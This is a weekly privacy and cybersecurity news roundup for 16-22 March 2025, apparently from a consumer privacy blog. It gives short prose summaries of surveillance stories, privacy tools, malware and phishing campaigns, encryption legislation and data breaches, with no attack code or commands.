This is a news item roundup of privacy or privacy-related news items for 16 MAR 2025 - 22 MAR 2025. Information and summaries provided here are as-is for warranty purposes.

Note: You may see some traditional "security" content mixed-in here due to the close relationship between online privacy and cybersecurity - many things may overlap; for example, major vulnerabilities in popular software, which may compromise the security of user's devices (and therefore pose a threat to their privacy) and large data breaches where significant personal information is exposed.

Items presented here are typically curated with the end user and small groups (such as families and small/micro businesses) in mind. Due to this focus, items primarily affecting enterprises or large organizations may not be included, even if they are widespread or "popular" stories.

Privacy Tip of the Week

You should at least enable MFA on important/sensitive accounts. While MFA is primarily a security feature, its primary privacy benefit is adding another layer of security to prevent unauthorized access to information contained in particular important or sensitive accounts.

Surveillance Tech in the News

This section covers surveillance technology and methods in the news. Specifically, stories and news items where public and/or private organizations have leveraged their capabilities to encroach on user privacy; for example, data brokers using underhanded means to harvest user location data without user knowledge or public organizations using technology without regard for user privacy.

Android Apps Use Bluetooth and WiFi Scanning to Track Users Without GPS

Cyber Insider

Researchers found that 86% of apps they analyzed collect sensitive data, including location data stemming from scanning Wi-Fi network details, and collecting device identifiers. These apps also frequently use Bluetooth data to gather location information and proximity to nearby devices.

This data collection is primarily facilitated by software development kits, which developers may include in apps to bring features without coding things from the ground up - however, they may even be unaware of the privacy implications for their app users.

Judge stops Musk's team from 'unbridled access' to Social Security private data

Reuters

As DOGE continues to push for more access to various systems containing sensitive information of Americans' a judge orders the Social Security Administration to stop sharing data with "DOGE affiliates". Allegedly (and in line with prior reporting), DOGE accessed sensitive SSA data without proper vetting -- similar to when they gained access to US Treasury payment data, which also contains sensitive information of millions of Americans.

Researchers name several countries as potential Paragon spyware customers

TechCrunch

The Citizen Lab, a group of academics and security researchers, recently published a report indicating the governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are "likely" customers of Israeli spyware maker Paragon Solutions.

Privacy Tools and Services

Primarily covers tools and services with a focus on maintaining/improving/respecting user privacy. Generally includes recommended services/tools found on avoidthehack, but also may feature upcoming/other privacy services not necessarily recommended or promoted by avoidthehack.com

Privacy Tools

Bitwarden enables biometric unlock on Linux

Bitwarden

Installing Bitwarden through Snapcraft on Linux can use biometrics to unlock the desktop application.

Privacy Services

Cape opens $99/month beta of its privacy-first mobile plan, inks Proton deal, raises $30M

TechCrunch

I usually don't include beta software on in this series (or really on avoidthehack) or early-stage startups because things in those early-stages go through such turbulence... but given the Salt Typhoon breach and the apparent lackluster security practices and culture at just about every American telecommunications company, this was too interesting to ignore.

Cape is a mobile carrier startup claiming to provide a more secure and private service alternative to traditional telecommunications services. They also have appeared to partner with Proton...

Vulnerabilities and Malware

Primarily includes severe and exploited vulnerabilities in devices or software used by end users (ex: a major router firmware flaw). Malware campaigns covered generally target/affect the end user.

This section will not contain every vulnerability/CVE or malware campaign reported, but will focus on those with the largest potential impact on a wide range of end users.

Vulnerabilities

Apple’s Passwords app was vulnerable to phishing attacks for nearly three months after launch

9to5Mac

Mysk security researchers first discovered this vulnerability after noticing the Passwords app had connected to 130 different domains over regular (unencrypted) HTTP. Specifically, it was fetching account icons and defaulted to opening password reset pages over HTTP.

This vulnerability was patched by Apple in December 2024, but they only disclosed it recently.

Cybercriminals Exploit CheckPoint Antivirus Driver in Malicious Campaign

Infosecurity Magazine

Threat actors are leveraging a "bring your own vulnerable driver" (BYOVD) attack to bypass Windows security measures. Once bypassed, threat actors had high-level access and could view information such as user passwords and other stored credentials.

Microsoft isn't fixing 8-year-old shortcut exploit abused for spying

The Register

Nation-state backed threat actors (which includes North Korea, Iran, Russia, and China) have been abusing Windows shortcut files LNK for many years. These threat actors go to lengths to bury the actual commands used in malicious .LNK files which download malware onto the machine.

According to Microsoft, despite this observed trend, it doesn't intend to release a security fix -- but could do so in the future.

Malware

AMOS and Lumma stealers actively spread to Reddit users

MalwareBytes

Reddit posts (directly on reddit.com) by threat actors on subreddits frequented by cryptocurrency traders link to information stealing malware.

New Arcane infostealer infects YouTube, Discord users via game cheats

Bleeping Computer

A campaign spreading information stealer Arcane primarily uses video game cheats as a lure; specifically, the campaign uses YouTube videos promoting game cheats and cracks to trick users into downloading a password-protected archive containing a malware loader script. Once executed, the script fetches the information stealing malware.

The Kaspersky researchers noted the this "Arcane" information stealer has no known links or overlapping code with Arcane Stealer V. Additionally, Arcane steals a wide range of user data, including VPN account credentials, gaming client information, messaging apps, and information stored in various web browsers.

300 Malicious ‘Vapor’ Apps Hosted on Google Play Had 60 Million Downloads

SecurityWeek

Vapor campaign included over 180 malicious apps on Google Play posing as utility, health and fitness, and lifestyle apps designed to deploy "endless, intrusive full-screen interstitial video ads." Apps in the Vapor campaign bypassed the recent protections introduced in the latest versions of Android. These apps also attempted to harvest and user account credentials and credit card information.

Warning over free online file converters that actually install malware

MalwareBytes

Malicious websites offering free online file conversion (usually .docx to .pdf) may drop malware onto a device. The file conversion usually works, but the newly converted and subsequently downloaded file may contain malware designed to lift sensitive information such as credentials, passwords, and session tokens.

Sniper: Phantom's Resolution Is Seemingly Another Game That Installs Malware On Your PC

TheGamer

Valve removed video game "Sniper: Phantom's Resolution" from Steam upon user reports the game's free demo loaded malware onto their machines. A reddit user discovered the malware obtains administrator privileges and exfiltrates data stolen from the machine, which is common behavior of information stealers.

StilachiRAT analysis: From system reconnaissance to cryptocurrency theft

Microsoft Security

According to Microsoft, this remote access trojan (RAT) isn't widely distributed, but in their analysis of this malware they state it demonstrates "sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data."

Microsoft identified key capabilities of StilachiRAT, which includes collecting detailed system information, such as hardware identifiers and active RDP sessions; scanning for configuration data of 20 different Chrome cryptocurrency wallet extensions, extracting and decrypting saved credentials in Google Chrome, continuous monitoring of clipboard data, and command execution stemming from the C2 server.

Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT

Infosecurity Magazine

According to the latest HP Threat Insights Report, threat actors are increasingly leveraging malicious CAPTCHA campaigns (which in turn use ClickFix tactics) to trick users into running PowerShell commands installing Lumma Stealer onto their machines. In this report, HP also identified campaigns spreading XenoRAT by using social engineering tactics to convince users to enable/load macros in Word and Excel documents.

Phishing and Scams

Covers popular phishing schemes affecting end users - smishing, vishing, and any new scam/phish tactics for deceiving end users. May overlap some with malware, but focuses more on the phishing tactics than details on a malware delivery/campaign information.

Phishing

Semrush impersonation scam hits Google Ads

MalwareBytes

A phishing campaign leveraging Google Search Ads is impersonating popular SEO tool/SaaS Semrush. To run these malicious Google Search Ads, the threat actors successfully take over Google advertiser accounts and subsequently take out ads impersonating the Semrush brand. The malicious ads point to phishing pages designed to harvest Google account credentials.

Scareware Combined With Phishing in Attacks Targeting macOS Users

SecurityWeek

According to researchers at LayerX, threat actors originally targeting Windows users with scareware tactics have now also started targeting macOS users. Users incorrectly typing URLs for legitimate websites connected to compromised domain "parking" pages, then were redirected to phishing pages.

752,000 Browser Phishing Attacks Mark 140% Increase YoY

Infosecurity Magazine

This is not a description of any specific phishing campaign. According to a report by Menlo Security, between 2023 and 2024 there was a 140% year-over-year increase in browser-based phishing attacks. According to this data, threat actors (they specifically call out cybercriminals) are focusing on browsers as their primary attack vector.

The report also outlines notable trends related to browser-based phishing attacks -- for example, the abuse of Cloudflare services for phishing, which increased by 104% in 2024.

Service Providers' Privacy Practices

This section is dedicated to notable changes or developments in popular/large service provider's privacy practices.

Service providers listed here are not necessarily "privacy-focused," but may have privacy practice changes positively (ex: adopting end-to-end encryption for messaging or) or negatively (ex: increased sharing of data with affiliates) affecting a large amount of users.

Gmail's upgraded search results help you find the emails you want, faster.

Google blog

Google introduces AI to searching for emails on its mail app, apparently leveraging elements like "recency, most-clicked emails and frequent contacts." There doesn't appear to be a specific privacy policy change associated with this particular change.

Legislation/Regulations/Lawsuits

Predominately focused on legal/regulation privacy practices outlined in US law (ex: FTC banning certain companies from sharing location data), but large enough changes in EU law may also be covered here.

Legislation and Regulation

A Win for Encryption: France Rejects Backdoor Mandate

EFF

While not US-based, this is worth including and following consider the US's close ties with countries in the EU.

French legislators were considering a dangerous proposal that would enable backdoors in end-to-end encrypted platforms. Such a measure would particularly threaten the integrity of end-to-end encrypted messengers, ultimately negatively impacting any security and privacy gained from using such messengers.

Data Breaches and Leaks

Generally covers large data breaches (or data leaks) exposing sensitive information of users - typically the focus is on US companies and on data breaches affecting primarily US citizens, though some exceptions are made depending on potential impact and scale.

Will not cover every data breach, naturally, due to frequency and scale.

Data breaches

US teachers’ union says hackers stole sensitive personal data on over 500,000 members

TechCrunch

According to a filing with Maine's attorney general on 18 MAR 2025, the Pennsylvania State Education Association (PSEA) suffered a cyber attack sometime in JUL 2024. In this attack, the threat actor gained unauthorized access to data belonging to over 517,000 individuals.

The stolen data includes:

• members' government issued IDs
• social security numbers
• passport numbers
• medical information
• card numbers -- including PINs and expiration dates

Compromised data varies between individuals.

Sperm donation giant California Cryobank warns of a data breach

Bleeping Computer

The largest sperm bank in the US - California Cryobank, suffered a data breach exposing customers' personal information. The breach originally occurred in APR 2024. Information compromised varies for customers, but could include:

• Names
• Bank account/routing numbers
• Social Security numbers
• driver's license numbers
• credit card information
• health insurance information

As of writing it is unclear whether donor information was compromised.

Oracle denies breach after hacker claims theft of 6 million data records

Bleeping Computer

This data breach is unconfirmed as of writing. A threat actor known as rose87168 claimed to be selling ~6 million data records stolen from Oracle Cloud federated SSO servers. As "proof" of the data breach, the threat actor released text files containing a sample database and LDAP information of associated companies. The threat actor also shared an Internet Archive URL where they uploaded a .txt file containing their ProtonMail email addresses to an Oracle server.

Data leaks

DOGE staffer violated Treasury rules by emailing unencrypted personal data

TechCrunch

A staffer working for DOGE broke Treasury policies surrounding the handling of personal information; according to a federal lawsuit, the staffer sent an email containing unencrypted personal information. As of writing, no details on what data was improperly shared.

DOGE to Fired CISA Staff: Email Us Your Personal Data

KrebsOnSecurity

Included for the data leak potential from data mishandling or interception. Various aspects of federal employees at the Cybersecurity and Infrastructure Security Agency (CISA) have been "layed off" in recent months by the current administration. However, a recent court order legally required agencies to rehire the layed off probationary employees.

However, deviating from conventional security principles, a message posted to the CISA website instructs recently fired CISA employees to send their personal information (including social security numbers and dates of birth) in a password-protected email attachment to be rehired... with the password included in the body of the email.

‘Dogequest’ Site Claims to Dox Tesla Owners Across the U.S.

404media

Website DOGEQUEST has a searchable map with the alleged names, addresses, phone numbers, and email addresses of Tesla owners across the US. The map also includes addresses of Tesla dealerships, Tesla superchargers, and personal information of DOGE.

Personal data revealed in released JFK files

MalwareBytes

The current administration ordered the release of over 60,000 pages related to the 1963 assassination of President John F. Kennedy on 17 MAR 2025. The release doesn't answer many lingering questions or settle numerous conspiracy theories, but it did leak approximately 400 social security numbers and other personal identifiable information of former congressional staffers.